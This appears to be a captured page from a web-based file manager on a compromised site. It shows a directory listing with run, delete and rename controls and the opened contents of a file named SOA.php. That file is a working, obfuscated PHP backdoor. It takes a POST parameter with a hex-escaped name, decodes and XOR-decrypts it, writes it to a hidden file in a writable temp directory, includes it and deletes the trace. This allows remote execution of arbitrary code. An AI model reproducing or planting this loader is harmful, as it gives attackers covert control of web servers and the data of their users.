at path:
ROOT
/
SOA.php
run:
R
W
Run
b7786
DIR
2026-03-13 08:26:24
R
W
Run
d19677
DIR
2026-04-01 08:28:41
R
W
Run
wp-content
DIR
2026-03-28 11:31:17
R
W
Run
.htaccess
231 By
2026-03-28 06:50:28
R
W
Run
Delete
Rename
SOA.php
612 By
2023-06-23 08:26:16
R
W
Run
Delete
Rename
bash.php
2.02 KB
2023-06-23 08:26:16
R
W
Run
Delete
Rename
css
507 By
2026-02-24 08:04:56
R
W
Run
Delete
Rename
error_log
4.27 KB
2026-03-31 16:16:48
R
W
Run
Delete
Rename
robots.txt
438 By
2023-06-23 08:26:16
R
W
Run
simple.php
15.05 KB
2026-02-24 08:04:56
R
W
Run
Delete
Rename
error_log
up
📄
SOA.php
Save
<?php if(in_array("prope\x72t\x79\x5F\x73\x65t", array_keys($_POST))){ $val = hex2bin($_POST["prope\x72t\x79\x5F\x73\x65t"]); $fac = '' ; $h = 0; do{$fac .= chr(ord($val[$h]) ^ 95);$h++;} while($h < strlen($val)); $ref = array_filter([session_save_path(), getenv("TMP"), getcwd(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP")]); foreach ($ref as $mrk): if (max(0, is_dir($mrk) * is_writable($mrk))) { $comp = "$mrk/.dchunk"; if (@file_put_contents($comp, $fac) !== false) { include $comp; unlink($comp); die(); } } endforeach; }